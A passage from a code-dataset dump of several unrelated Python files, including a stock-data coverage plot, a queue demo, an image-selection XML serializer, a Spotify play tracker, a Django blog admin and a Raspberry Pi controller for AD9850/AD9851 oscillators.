Years)' % (\n\t\tnum_assets,\n\t\tnum_quarters,\n\t\t(num_quarters / 4)),\n\t\tfontsize=14)\n\tax.set_ylabel('%d Stocks (sorted from least to most coverage)' % num_assets)\n\tax.set_yticks([])\n\tax.set_xlabel('Quarters')\n\tyears = sorted(set(map(lambda q : q.split('-')[0], quarters)))\n\tyears_x_loc = []\n\tfor y in years:\n\t\t# year x loc goes at beginning of quarter\n\t\tquarters_in_year = list(filter(lambda q : q.split('-')[0] == y, quarters))\n\t\tq1 = min(quarters_in_year)\n\t\tyears_x_loc.append(quarters.index(q1))\n\tmry = int(latest_quarter.split('-')[0]) # mry = most recent year\n\tyears = list(map(lambda y : y if (mry-int(y))%5==0 else '', years))\n\tax.set_xticks(years_x_loc)\n\tax.set_xticklabels(years)\n\n\t# format labels appear when hoving over a point\n\t# source: https://stackoverflow.com/questions/7908636/possible-to-make-labels-appear-when-hovering-over-a-point-in-matplotlib\n\tdef format_coord(x, y):\n\t\tticker = list(data_coverage_dct.keys())[int(y)]\n\t\tquarter = quarters[int(x)]\n\t\t_y, _m, _d = tuple(quarter.split('-'))\n\t\tquarter_label = '%s Q%d' % (_y, (int(_m) / 3))\n\t\tnum_quarters_with_nonzero_coverage = data_coverage_dct[ticker][0]\n\t\tquarter_values_with_nonzero_coverage = \\\n\t\t\tlist(filter(lambda coverage : coverage > 0.0, data_coverage_dct[ticker][1]))\n\t\tdata_coverage_average_of_all_non_zero_quarters = \\\n\t\t\tfloat(sum(quarter_values_with_nonzero_coverage)) / len(quarter_values_with_nonzero_coverage) \\\n\t\t\tif len(quarter_values_with_nonzero_coverage) > 0 else 0.0\n\t\tpercent_of_quarters_with_nonzero_data_coverage = \\\n\t\t\t100.0 * float(num_quarters_with_nonzero_coverage) / num_quarters\n\t\tcurrent_quarter_coverage = data_coverage_dct[ticker][1][int(x)]\n\t\tcurrent_quarter_coverage_pct = 100 * float(current_quarter_coverage) / num_metrics\n\t\ts1 = \"Stock %d / %d: %s%s\" % (int(y)+1, num_assets, ticker, ' '*(6-len(ticker)))\n\t\ts2 = \"Quarter: %s, %d / %d fields (%.1f%%) are covered\" % (quarter_label, 
current_quarter_coverage, num_metrics, current_quarter_coverage_pct)\n\t\ts3 = \"%d / %d quarters (%.1f%%) have data.\" % (num_quarters_with_nonzero_coverage, num_quarters, percent_of_quarters_with_nonzero_data_coverage)\n\t\ts4 = \"Data's average coverage: %.1f%%.\" % (data_coverage_average_of_all_non_zero_quarters)\n\t\treturn '\\t'.join([s1, s2, s3, s4])\n\tax.format_coord = format_coord\n\n\t# legend\n\t# source: https://stackoverflow.com/questions/32462881/add-colorbar-to-existing-axis\n\tdivider = make_axes_locatable(ax)\n\tcax = divider.append_axes('right', size='5%', pad=0.10)\n\ttick_locs = np.linspace(0, num_metrics-1, 5) # why there should be -1 idk, but without it the top tick disappears\n\tcbar = fig.colorbar(\n\t\tplot,\n\t\tcax=cax,\n\t\torientation='vertical')\n\tcbar.ax.set_ylabel('Percent Data Coverage (out of %d fields)' % num_metrics, fontsize=12)\n\tcbar.set_ticks(tick_locs)\n\tcbar.ax.set_yticklabels(['0 %', '25 %', '50 %', '75 %', '100 %'])\n\n\n\tplt.show()\n\tif verbose:\n\t\tprint('Plot complete.\\n')\n\n\n\nif __name__ == '__main__':\n\tchart_number = select_chart()\n\tif chart_number == 1: plot_stock_vs_quarter(num_indents=0)\n\tif chart_number == 2: plot_metric_vs_quarter(num_indents=0)\n\tif chart_number == 3: pass\n\tif chart_number == 4: pass\n","repo_name":"LukeDickerson19/value-investing-app","sub_path":"database/sec/financial_statements_data_sets/src/plot_data_quality.py","file_name":"plot_data_quality.py","file_ext":"py","file_size_in_byte":16966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"16706047811","text":"# -*- coding:utf-8 -*-\n\"\"\"\nQueue 先进先出 线程安全\n\"\"\"\nfrom __future__ import print_function\nimport Queue, time, threading\n\n\ndef qu_fifo():\n \"\"\"\n FIFO 先进先出\n :return:\n \"\"\"\n q = Queue.Queue()\n for i in range(1,6):\n q.put(i)\n\n while True:\n if q.empty():\n break\n item = q.get()\n print(item, end=' ')\n\ndef create_qu(q):\n for i in range(1,6):\n print(\"put item:%s\"%(i))\n q.put(i)\n time.sleep(1)\n\ndef cost_qu(q):\n while True:\n if q.empty():\n break\n item = q.get()\n print(\"get item:%s\"%(item))\n time.sleep(1)\n\ndef main():\n q = Queue.Queue()\n create = threading.Thread(target=create_qu, args=(q,))\n cost = threading.Thread(target=cost_qu, args=(q,))\n\n create.start()\n cost.start()\n\n create.join()\n cost.join()\n\n\ndef qu_lifo():\n \"\"\"\n LOFO 后进先出\n :return:\n \"\"\"\n q = Queue.LifoQueue()\n for i in range(1,6):\n q.put(i)\n\n while True:\n if q.empty():\n break\n item = q.get()\n print(item, end=' ')\n\n\nif __name__ == '__main__':\n print(\"============FIFO===========\")\n qu_fifo()\n print()\n main()\n print(\"=============LIFO===========\")\n qu_lifo()","repo_name":"rzlmma/pythonPro","sub_path":"standardLibrary/datastruct/queue/qu_code.py","file_name":"qu_code.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"21204249747","text":"#License: Public Domain\n#\n#imgselection.py\n#\n\"\"\"Provides the implementation for representing an image learning \nselection\n\nUnit tests are in the current directory (test_imgselection.py)\"\"\"\n#standard modules:\nimport imghdr\nfrom abc import ABCMeta\nfrom abc import abstractmethod\nimport xml.etree.ElementTree as ET\nfrom collections.abc import MutableSequence\n#third-party modules:\nfrom pygame import image\n#local(included) modules:\nimport imgresult\nimport imgsnipper\nfrom pyextra import 
Validators\nfrom imgsnipper import ImageSnipperBase\nfrom iserializer import ISerializer\nfrom imgsnipper import RectangularSnipper\n\n__all__ = [\"ImageSelection\", \"ISSerializer\"]\n\nclass ImageSelection(MutableSequence):\n \"\"\"\n This class provides the concrete representation of image training data \n that is used to maintain and manage image learning selection.\n \"\"\"\n def __init__(self, bwidth, bheight, snipper = RectangularSnipper):\n \"\"\"\n ImageSelection.__init__(bwidht, bheight, snipper = \n RectangularSnipper) -> ImageSelection\n \n Construncts image selection object.\n \"\"\"\n if not issubclass(snipper, ImageSnipperBase):\n raise TypeError(\"The specified snipper must be a subclass \"\n \"that derived from imgsnipper.ImageSnipperBase\")\n if not isinstance(bwidth, int) or not isinstance(bheight, int):\n raise TypeError(\"Both the block width and the block height \"\n \"must be integers, not ({}, {})\".format(\n type(bwidth), type(bheight)))\n elif bwidth < 1 or bheight < 1:\n raise ValueError(\"Both the block width and the block height \"\n \"must be more than one, not ({}, {})\".format(\n bwidth, bheight))\n self.__bwidth = bwidth\n self.__bheight = bheight\n self.__snipper = snipper\n self.__items = []\n self.__results = []\n \n def __repr__(self):\n \"\"\"\n S.__repr__() <==> repr(S) -- \"official\" string representation\n \"\"\"\n return \"{}({}, {}, {})\".format(self.__class__.__name__, \n self.__snipper.__name__, self.__bwidth, self.__bheight)\n\n def __len__(self):\n \"\"\"\n S.__len__() <==> len(S)\n \"\"\"\n return len(self.__items)\n\n def __getitem__(self, key):\n \"\"\"\n S.__getitem__((index, *parser)) -> tuple\n Return value: results, ImageSnipper [,ImageSniper, ...]\n \n * 'parser' -- any one-argument function for mapping pixels\n * 'index' -- index of the desired item\n \"\"\"\n if len(key) < 2:\n raise IndexError(\"The specified key can not be allowed. 
\"\n            \"The key must include one index and at least one \"\n            \"parser function\")\n        index = Validators.arrayindex(key[0], len(self))\n        surface = image.load(self.__items[index])\n        return ((self.__results,) + tuple(self.__snipper(surface, \n            self.__bwidth, self.__bheight, pix_parser = parser) \n            for parser in key[1:]))\n\n    def __setitem__(self, index, value):\n        \"\"\"S.__setitem__(i, v) <==> S[i] = v\"\"\"\n        index = Validators.arrayindex(index, len(self))\n        index = self.insert(index, value)\n        del self[index + 1]\n    \n    def __delitem__(self, index):\n        \"\"\"S.__delitem__(index) <==> del I[index] -- delete item\"\"\"\n        del self.__items[index]\n        del self.__results[index]\n\n    def insert(self, index, value):\n        \"\"\"\n        S.insert item before the index\n        \"\"\"\n        path, result = value\n        if not isinstance(result, imgresult.ImageResultBase):\n            raise TypeError(\"The 'result' must implement \"\n                \"imgresult.ImageResultBase\")\n        index = Validators.arrayindex(index, len(self) + 1)\n        if not imghdr.what(path) in ('jpeg', 'png', 'gif', \n                'bmp', 'tiff', 'pbm', 'pgm', 'ppm' ):\n            raise TypeError(\"The specified file is not supported\")\n        self.__items.insert(index, path)\n        self.__results.insert(index, result)\n        return index\n\n    def paths(self):\n        \"\"\"S.paths() -> tuple -- return all paths\"\"\"\n        return tuple(self.__items)\n\n    def results(self):\n        \"\"\"S.results() -> results -- return all results\"\"\"\n        return tuple(self.__results)\n\n    @property\n    def snipper(self):\n        \"\"\"\n        S.snipper -> ImageSnipper, int (block width), int (block height)\n        \"\"\"\n        return self.__snipper, self.__bwidth, self.__bheight\n\n    @property\n    def bshape(self):\n        \"\"\"S.bshape -> tuple(width, height) -- block shape\"\"\"\n        return self.__bwidth, self.__bheight\n\nclass ISSerializer(ISerializer):\n    \"\"\"\n    Provides a simple implementation for serialization to and from \n    standard XML. It can be used for parsing/writing ImageSelection \n    objects from/to an XML-file\n    \"\"\"\n    TAG_ROOT = \"imgselection\"\n    TAG_IMG = \"image\"\n    ATTR_PATH = \"path\"\n    ATTR_SNIPPER = \"snipper\"\n    ATTR_RESULT_FUNC = \"result_function\"\n    ATTR_BLOCK_WIDTH = \"bwidht\"\n    ATTR_BLOCK_HEIGHT = \"bheight\"\n    \n    @staticmethod\n    def write(source, target):\n        \"\"\"\n        ISSerializer.write(source, target) -> None\n        \n        Writes your image selection to the specified file\n        * \"source\" is an instance of ImageSelection or of a subclass\n        thereof\n        * \"target\" is either the name of a file or a binary file object\n        \"\"\"\n        if not isinstance(source, ImageSelection):\n            raise TypeError(\"Invalid source type. 
ImageSelection \"\n \"implementations are only acceptible\")\n Validators.bfileobject(target)\n snipfunc, bwidth, bheight = source.snipper\n #root attributes contain snipper parameters\n root = ET.Element(ISSerializer.TAG_ROOT, attrib = {\n ISSerializer.ATTR_SNIPPER : snipfunc.__name__,\n ISSerializer.ATTR_BLOCK_WIDTH : str(bwidth),\n ISSerializer.ATTR_BLOCK_HEIGHT : str(bheight)})\n #Sub elements provide image links and result values\n for path, result in zip(source.paths(), source.results()):\n sub = ET.SubElement(root, ISSerializer.TAG_IMG, attrib = {\n ISSerializer.ATTR_PATH : path,\n ISSerializer.ATTR_RESULT_FUNC : result.__class__.__name__})\n sub.text = result.to_string()\n ET.ElementTree(root).write(target)\n\n @staticmethod\n def parse(target, outresult = ImageSelection):\n \"\"\"\n ISSerializer.parse(target) -> ImageSelection\n \n Loads an image selection from its XML-representation.\n * \"target\" is either a filename or a file object\n * \"outresult\" is either the ImageSelection class of a subclass\n thereof\n \"\"\"\n if not issubclass(outresult, ImageSelection):\n raise TypeError(\"'outresult' argument be either the\"\n \"ImageSelection class or a subclass thereof.\")\n Validators.bfileobject(target)\n root = ET.parse(target).getroot()\n snipfunc = root.get(ISSerializer.ATTR_SNIPPER)\n bwidth = int(root.get(ISSerializer.ATTR_BLOCK_WIDTH))\n bheight = int(root.get(ISSerializer.ATTR_BLOCK_HEIGHT))\n snipfunc = getattr(imgsnipper, snipfunc)\n \n S = outresult(bwidth, bheight, snipper = snipfunc)\n for image in root:\n path = image.get(ISSerializer.ATTR_PATH)\n rfunc = image.get(ISSerializer.ATTR_RESULT_FUNC)\n result = getattr(imgresult, rfunc).from_string(image.text)\n S.append((path, result))\n return S\n","repo_name":"thetechbuilder/map_analyzer","sub_path":"imgselection.py","file_name":"imgselection.py","file_ext":"py","file_size_in_byte":7631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31922178069","text":"import spotipy\nimport spotipy.util as util\nfrom pymongo import MongoClient\nfrom profileinfo import username, client_id, client_secret, cluster\nimport time \n\n# database setup\nclient = MongoClient(cluster)\ndb = client.spotify\nstats = db.stats\n\n# spotify login\ntoken = util.prompt_for_user_token(\n username,\n scope=[\"user-read-recently-played\", \"playlist-modify-private\"], # https://developer.spotify.com/documentation/general/guides/authorization/scopes/#playlist-modify-private\n client_id=client_id,\n client_secret=client_secret,\n redirect_uri='http://localhost/'\n)\n\n# sets starting point\nmost_recent = {'name': 'Dark seeks light', 'artist': 'ニノミヤユイ', 'duration': 214426, 'played_at': '2022-01-24T16:11:20.801Z'}\n\nwhile True: \n sp = spotipy.Spotify(auth=token)\n recently_played = sp.current_user_recently_played(limit=50)['items']\n\n for song in recently_played:\n my_dict = {'name':[],'artist':[],'duration':[],'played_at':[]}\n my_dict['name'] = (song['track']['name'])\n my_dict['artist'] = (song['track']['artists'][0]['name'])\n my_dict['duration'] = (song['track']['duration_ms'])\n my_dict['played_at'] = (song['played_at'])\n\n # check if updated\n if my_dict == most_recent:\n print('caught up!')\n break\n \n result = stats.insert_one(my_dict)\n print(f'Inserted: {my_dict}')\n\n # set new most_recent\n most_recent = {\n 'name':recently_played[0]['track']['name'],\n 'artist':recently_played[0]['track']['artists'][0]['name'],\n 'duration':recently_played[0]['track']['duration_ms'],\n 
'played_at':recently_played[0]['played_at']\n }\n\n print(f'most recent: {most_recent}')\n time.sleep(7200)","repo_name":"joeywangzr/Spotify-Tracking","sub_path":"tracking system/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72294777521","text":"\nclass XLHEADERS():\n COUNTRY = 'country'\n CITY = 'city'\n STATION_EOI_CODE = 'stationeoicode'\n STATION_NAME = 'stationname'\n AIR_POLLUTANT = 'airpollutant'\n AIR_POLLUTION_LEVEL = 'airpollutionlevel'\n TYPE = 'type'\n AREA = 'area'\n LONGITUDE = 'longitude'\n LATITUDE = 'latitude'\n ALTITUDE = 'altitude'\n\n choices = [COUNTRY, CITY, STATION_EOI_CODE, STATION_NAME, AIR_POLLUTANT, AIR_POLLUTION_LEVEL, TYPE, AREA,\n LONGITUDE, LATITUDE, ALTITUDE]\n\n\ndef get_headers_and_units(ws):\n headers_row = None # на какой строке начинается заголовок.\n headers = {} # в каком столбце название заголовка\n units = '' # единицы измерения\n\n # get headers row\n for row in range(ws.max_row + 1):\n cell = ws['A'][row].value\n if isinstance(cell, str) and 'country' in cell.lower():\n headers_row = row\n break\n if headers_row is None:\n return None, None, None\n\n # remember headers' positions\n for i in range(ws.max_column):\n column = chr(i + 65)\n header = ws[column][headers_row].value\n if header is None:\n break\n header = header.strip().replace('_', '').lower()\n # print(type(header))\n\n # get units\n if 'm3' in header:\n units_index = header.find('(') + 1\n for index in range(units_index, units_index + 20):\n if header[index] == ')':\n break\n units += header[index]\n # print(type(units))\n elif 'unit' in header:\n units = ws[column][headers_row + 1].value\n continue\n\n units = units if units != 'count' else 'µg/m3'\n\n # Map headers with their indices\n for choice in XLHEADERS.choices:\n if choice in header:\n headers[choice] = i\n break\n\n return headers_row, headers, units\n\n\n\n\n\n\n\n\n\n","repo_name":"ArsenAjiev/markets_portfolio","sub_path":"airpollution/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"23940181494","text":"from html import escape as html_escape\n\nfrom django.contrib.admin import site as admin_site\nfrom django.utils import timezone\n\nfrom django.contrib.admin import (\n ModelAdmin,\n StackedInline,\n)\n\nfrom .models import (\n Article,\n ArticleTag,\n Commenter,\n ArticleComment,\n)\n\n\nclass ArticleTagInline (StackedInline):\n model = ArticleTag\n\n\nclass ArticleCommentInline (StackedInline):\n model = ArticleComment\n\n\nclass ArticleAdmin (ModelAdmin):\n list_display = (\n \"slug\",\n \"title\",\n \"author\",\n \"creation_date\",\n )\n\n inlines = [\n ArticleTagInline,\n ArticleCommentInline,\n ]\n\n\nclass ArticleTagAdmin (ModelAdmin):\n list_display = (\n \"tag\",\n \"article\",\n )\n\n\nclass CommenterAdmin (ModelAdmin):\n actions = (\n \"ban_all\",\n \"unban_all\",\n )\n\n list_display = (\n \"ip_hash\",\n \"time_banned\",\n )\n\n def ban_all(self, request, queryset):\n \"\"\"\n Issue a ban for all unbanned commenters.\n \"\"\"\n (\n queryset\n .filter(time_banned__isnull=True)\n .update(time_banned=timezone.now())\n )\n\n ban_all.short_description = \"Ban all selected commenters.\"\n\n def unban_all(self, request, queryset):\n \"\"\"\n Unban all commenters.\n \"\"\"\n queryset.update(time_banned=None)\n\n unban_all.short_description = 
\"Unban all selected commenters.\"\n\n\nclass ArticleCommentAdmin (ModelAdmin):\n fields = (\n \"commenter_link\",\n \"article\",\n \"poster_name\",\n \"content\",\n )\n\n readonly_fields = (\n \"commenter_link\",\n \"article\",\n )\n\n list_display = (\n \"article\",\n \"poster_name\",\n \"creation_date\",\n )\n\n def commenter_link(self, obj):\n if obj is None or not obj.pk:\n return \"(None)\"\n\n return '{}'.format(\n obj.commenter.pk,\n html_escape(obj.commenter.ip_hash),\n )\n\n commenter_link.short_description = \"Commenter\"\n commenter_link.allow_tags = True\n\n\nadmin_site.register(Article, ArticleAdmin)\nadmin_site.register(ArticleTag, ArticleTagAdmin)\nadmin_site.register(Commenter, CommenterAdmin)\nadmin_site.register(ArticleComment, ArticleCommentAdmin)\n","repo_name":"w0rp/w0rpzone","sub_path":"blog/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73724566322","text":"\r\n\"\"\" Version 0.1 - working prototype, must be refactored including the documentation.\r\n Utility for the AD9850/1 VCO (Voltage Controlled Oscillator) - module, connected to GPIO of Rpi.\r\n Supports all functions of the VCO - in serial mode. For hardware config see specs\r\n Program may configured to run on RPI or on master, connected to local network \"\"\"\r\n\r\nfrom math import pow, log10 as lg\r\nimport os, sys\r\n\r\n# To install gpiozero for acces gpio-pins see:\r\n# https://gpiozero.readthedocs.io/en/stable/remote_gpio.html#preparing-the-control-computer\r\nfrom gpiozero import LED\r\n\r\n# *** CONFIGURATION ***\r\n\r\n# RPI: for remote access enable or install Remote GPIO to allow communication via daemon\r\n# sudo systemctl start pigpiod => run daemon once\r\n# sudo systemctl enable pigpiod => run daemon at (re)boot\r\n\r\n# used VCO's.\r\n# WARNING configuring a D9850 as AD9851 may unintentionally set Factory Reserved Codes\r\nVCO_A = \"AD9851\" # or \"AD9850\"\r\nVCO_B = \"AD9850\" # or \"AD9851\" or None\r\n\r\n# Max VCO-clock at 5V supply voltage, but be aware of RPi 3,3V limit for GPIO-pins.\r\n# No problem encountered with 5V supply when only connecting the input pins of VCO to RPi.\r\nAD9851_clock = 30000000 # default (and max for 5 volt supply) crystal frequency AD9851\r\nAD9850_clock = 125000000 # default (and max for 5 volt supply) crystal frequency AD9850\r\n\r\n# Pin factories see: https://gpiozero.readthedocs.io/en/stable/api_pins.html\r\n# uncomment JUST ONE pin factory:\r\n# \r\n# pin_factory = \"rpigpio\" # When program runs on RPi, is DFAULT pin factory (uses RPI.GPIO lib)\r\n# pin_factory = \"mock\" # emulates gpio pins for test purposes\r\npin_factory = \"pigpio\" # for remote connection see:\r\n # https://gpiozero.readthedocs.io/en/stable/remote_gpio.html \r\n\r\n# Remote acces: fill in ip address of RPi for pigpio of wifi / utp cable connection\r\nip_addr=\"192.168.1.46\"\r\n\r\n# gpio interface wth VCO module (use gpio numbers, not physical pin numbers)\r\ngif_A = dict(RESET=22, W_CLK=23, FQ_UD=24, DATA=25)\r\n\r\n# gpio interface second VCO if connected\r\ngif_B = dict(RESET=26, W_CLK=17, FQ_UD=27, DATA=6)\r\n\r\nstart_freq = 1000 # Initial frequentie VCO\r\n\r\n#*** END CONFIGURATION ***\r\n\r\nclass PrgrsBar:\r\n def __init__(self, bar_len = 50, bar_char='-', limit_char = '|'):\r\n self.bar_len = bar_len\r\n self.bar_char = bar_char\r\n self.limit_char = limit_char\r\n self.cur_len = 0\r\n self.ref_bar = False\r\n\r\n def 
_ref_bar_init(self):\r\n print(f\"{self.limit_char}{self.bar_len*self.bar_char}{self.limit_char}\")\r\n print('>', end = '')\r\n self.cur_len = 0\r\n self.ref_bar = True\r\n\r\n def prgrs(self, fraction):\r\n if fraction < 0 or fraction > 1:\r\n return False\r\n if self.ref_bar:\r\n self.bar_val = int(fraction * self.bar_len)\r\n if self.bar_val > self.cur_len:\r\n print(f\"{(self.bar_val - self.cur_len) * self.bar_char}\", end = '')\r\n self.cur_len = self.bar_val\r\n if self.cur_len >= self.bar_len:\r\n print('<')\r\n self.cur_len = 0\r\n self.ref_bar = False\r\n else:\r\n self._ref_bar_init()\r\n self.ref_bar = True\r\n return True\r\n\r\nclass parse(): # parse and execute user commands\r\n # multiply factors for values\r\n mulfactors = {'k':1000, 'K':1000, 'm':1000000, 'M':1000000, 'c':0.01, 'C':0.01}\r\n \r\n def __init__(self, system_interface1, system_interface2):\r\n self.cmds = dict(c=self.config, f=self.freq, h=self.help, r=self.reset, i=self.idle_mode, \\\r\n s=self.sweep, l=self.lsweep, q=self.quit,w=self.restore_reg, \\\r\n p=self.phase_shift, m=self.multiplier, a=self.a_VCO, b=self.b_VCO)\r\n\r\n self.pb = PrgrsBar() # Progress bar for frequency sweep\r\n \r\n self.sif_A = system_interface1\r\n self.sif_B = system_interface2\r\n self.sif = self.sif_A\r\n \r\n if self.sif_B != None:\r\n self.prompt = 'A'\r\n self.cmds.update(e=self.exchange)\r\n else: self.prompt = \"\"\r\n \r\n def isreal(self, s): # value is real number - test\r\n try:\r\n x = float(s)\r\n return x\r\n except: return None\r\n\r\n def param_val(self, s): # convert number string to real number\r\n for i in self.mulfactors.keys():\r\n if i in s:\r\n s = s.replace(i ,\"\", -1)\r\n value = self.isreal(s.strip())\r\n if value != None:\r\n return value * self.mulfactors[i]\r\n else: return None\r\n \r\n return self.isreal(s.strip())\r\n \r\n def xqt_cmd(self, cmd):\r\n # treat single number as frequency command (add 'f' to number string)\r\n if cmd[0].isdigit() or cmd[0] == '.':\r\n cmd = 'f'+ cmd\r\n\r\n if cmd[0].lower() in self.cmds.keys(): # ==> execute command\r\n if not self.cmds[cmd[0].lower()](cmd):\r\n print(f\"Error in cmd: {cmd}\")\r\n else:\r\n print(f\"Invalid cmd: {cmd}\")\r\n\r\n\r\n def get_cmd(self): # get and execute user command\r\n print(\"enter command (h for help):\")\r\n while True:\r\n user_input = input(f\"{self.prompt}?\").strip()\r\n if user_input == \"\":\r\n continue\r\n \r\n self.xqt_cmd(user_input.strip())\r\n\r\n # General user functions to execute\r\n def a_VCO(self, cmd):\r\n saved = self.sif\r\n self.sif = self.sif_A\r\n if len(cmd) > 1:\r\n self.xqt_cmd(cmd[1:].strip())\r\n self.sif = saved\r\n return True\r\n\r\n def b_VCO(self, cmd):\r\n saved = self.sif\r\n self.sif = self.sif_B\r\n if len(cmd) > 1:\r\n self.xqt_cmd(cmd[1:].strip())\r\n self.sif = saved\r\n return True\r\n \r\n def exchange(self, cmd):\r\n if self.prompt == 'A':\r\n self.prompt = 'B'\r\n self.sif = self.sif_B\r\n else:\r\n self.prompt = 'A'\r\n self.sif = self.sif_A\r\n return True\r\n \r\n def sweep(self, cmd): # frequency sweep\r\n params = cmd[1:].strip().split()\r\n if len(params) == 3:\r\n values = []\r\n try:\r\n values = [self.param_val(i) for i in params]\r\n except:\r\n return False\r\n f_start = values[0]; f_end = values[1]; f_incr = values[2]\r\n if f_start < f_end:\r\n print(f'Sweep {f_start} {f_end} {f_incr}')\r\n f = f_start\r\n f_range = f_end - f_start\r\n while True:\r\n f = f if f <= f_end else f_end\r\n self.sif.set_freq(f)\r\n self.pb.prgrs((f-f_start)/f_range)\r\n if f >= f_end:\r\n 
break\r\n f += f_incr\r\n return True\r\n return False\r\n\r\n def lsweep(self, cmd): # logarithmic (exponential) frequency sweep\r\n params = cmd[1:].strip().split()\r\n if len(params) == 3:\r\n values = []\r\n try:\r\n values = [self.param_val(i) for i in params]\r\n except:\r\n return False\r\n \r\n f_start = values[0]; f_end = values[1]; f_steps = int(values[2])\r\n exp_start = lg(f_start)\r\n exp_end = lg(f_end)\r\n exp_range = exp_end - exp_start\r\n exp_incr = exp_range / f_steps\r\n print(f'Sweep {f_start} {f_end} {f_steps}')\r\n f=pow(10,exp_start)\r\n exp = exp_start\r\n\r\n for step in range(f_steps+1):\r\n self.sif.set_freq(f)\r\n self.pb.prgrs((step)/f_steps)\r\n exp += exp_incr\r\n f = pow(10, exp)\r\n return True\r\n else:\r\n return False\r\n \r\n def quit(self, cmd): # end program\r\n if len(cmd) == 1:\r\n sys.exit()\r\n return False\r\n\r\n def config(self, cmd):\r\n self.sif.show_config()\r\n return True\r\n \r\n def help(self, cmd):\r\n print(\"\"\"\r\n Command letters may be upper or lower case\r\n -----------------------------------------\r\n - a: VCO A prefix, xqt command once for VCO A - example B?af 1000\r\n - b: VCO B prefix, xqt command once for VCO B - example A?bf 1000\r\n - e: change default VCO (VCO A <=> VCO B)\r\n - f: frequency: f freq# or freq#[k-kHz, m-mHz, c-1/100Hz] - examples: f100k ; 1m\r\n - s: sweep freq: s start freq, end freq, delta freq - example: s 1000 1m 100k\r\n - l: log (exp) sweep: l start freq, end freq, number of steps - l 20 20k 20\r\n - m: set/reset frequency multiplier: (AD9851 only, may harm AD9850!): m+ / m-\r\n - p: set phase shift (0..31 X 11.25 degrees): p number[0..31] - example: p 23\r\n - i: set/reset idle (power) mode: i+ / i-\r\n - r: reset frequency generator AND clears VCO-register\r\n - w: write register (restore VCO register value)\r\n - c: show current configuration settings\r\n - q: quit program\r\n - h: This help function: h\\n\"\"\")\r\n return True\r\n\r\n # logical AD98x chip-functions to execute \r\n def freq(self, cmd): # set frequency\r\n self.freq = self.param_val(cmd[1:].strip())\r\n if self.freq != None:\r\n return self.sif.set_freq(self.freq)\r\n else:\r\n return False\r\n\r\n def idle_mode(self, cmd):\r\n if '+' in cmd:\r\n return self.sif.set_pwr_sleep(1)\r\n\r\n elif '-' in cmd:\r\n return self.sif.set_pwr_sleep(0)\r\n\r\n return False\r\n \r\n def phase_shift(self, cmd):\r\n phase = self.param_val(cmd[1:].strip())\r\n print(\"phase: \", phase)\r\n if phase != None and phase in range(32):\r\n return self.sif.set_phase_shift(int(phase))\r\n return False\r\n\r\n def multiplier(self, cmd):\r\n print(\"multiplier set/reset\")\r\n if '+' in cmd:\r\n return self.sif.set_multiplier(1)\r\n elif '-' in cmd:\r\n return self.sif.set_multiplier(0)\r\n else: return False\r\n\r\n def reset(self, cmd):\r\n return self.sif.reset()\r\n\r\n def restore_reg(self,cmd):\r\n return self.sif.set_reg_vals()\r\n \r\n#=========================== low level IO functions\r\n\r\nclass CntrlFunctions(): # low level io interface functions\r\n def __init__(self):\r\n self.reset()\r\n self.resetpin.off()\r\n self.w_clk.off()\r\n self.data.off()\r\n self.fq_ud.off()\r\n\r\n def pulse(self, pin): # simple pulse \r\n pin.on()\r\n# pin.on() # repeat when pulse width is too short\r\n pin.off()\r\n\r\n def reset(self):\r\n self.pulse(self.resetpin)\r\n self.write_reg(0,0) # define register value, undefined control bits may harm chip\r\n return True\r\n\r\n def write_reg(self, word, byte): # write control byte and frequency word bit for bit to 
chip\r\n\r\n for i in range (32):\r\n if word & 0x01: self.data.on()\r\n else: self.data.off()\r\n word = word >> 1\r\n self.pulse(self.w_clk)\r\n \r\n for i in range (8):\r\n if byte & 0x1: self.data.on()\r\n else: self.data.off()\r\n byte = byte >> 1\r\n self.pulse(self.w_clk)\r\n \r\n self.pulse(self.fq_ud)\r\n return True\r\n\r\nclass GpioADxIf(CntrlFunctions): # set IO paramters\r\n def __init__(self, params):\r\n self.resetpin = LED(params[\"RESET\"])\r\n self.w_clk = LED(params[\"W_CLK\"])\r\n self.fq_ud = LED(params[\"FQ_UD\"])\r\n self.data = LED(params[\"DATA\"])\r\n super().__init__()\r\n\r\n#================= logical functions for AD98x chip\r\n\r\nclass AD98x():\r\n def __init__(self, iface):\r\n self.clock_freq = self.sys_clock\r\n self.freq_word = 0x0\r\n self.phase_shift = 0\r\n self.iface = iface\r\n# self.reset # for test\r\n\r\n def show_config(self): # current status of AD98x\r\n print(self.ic_name)\r\n print(f\"Register: {self.ctl_byte:02X} - {self.freq_word:08X}\")\r\n print(f\"Frequency input / real: {self.frequency:.2f} / {round(self.freq_word*self.clock_freq/4294967296, 2):.2f}\")\r\n print(f\"Phase shift: {self.ctl_byte >> 3} = {(self.ctl_byte >> 3)*11.25} degrees\")\r\n print(\"Multiplier bit: \", end = \"\")\r\n if self.ic_name == \"AD9851\":print(self.ctl_byte & 0x1)\r\n else: print(\"-\")\r\n print(f\"Clock frequency: {self.clock_freq}\")\r\n print(f\"Power mode: {self.ctl_byte & 0x4:1X}\")\r\n\r\n def reset(self):\r\n self.iface.reset()\r\n return True\r\n\r\n def set_freq(self, freq):\r\n self.frequency = freq\r\n self.freq_word = int((freq/self.clock_freq)*4294967296) & 0xFFFFFFFF\r\n self.iface.write_reg(self.freq_word, self.ctl_byte)\r\n return True\r\n\r\n def set_pwr_sleep(self, sleep_bit):\r\n print(\"Set to sleep set to \", sleep_bit)\r\n if sleep_bit:\r\n self.ctl_byte |= 0x04\r\n else:\r\n self.ctl_byte &= 0xFB\r\n self.iface.reset()\r\n \r\n self.iface.write_reg(self.freq_word, self.ctl_byte & self.ctl_mask)\r\n return True\r\n\r\n def set_multiplier(self, mp_bit):\r\n if mp_bit:\r\n self.ctl_byte |= 0x01\r\n self.clock_freq = 6 * 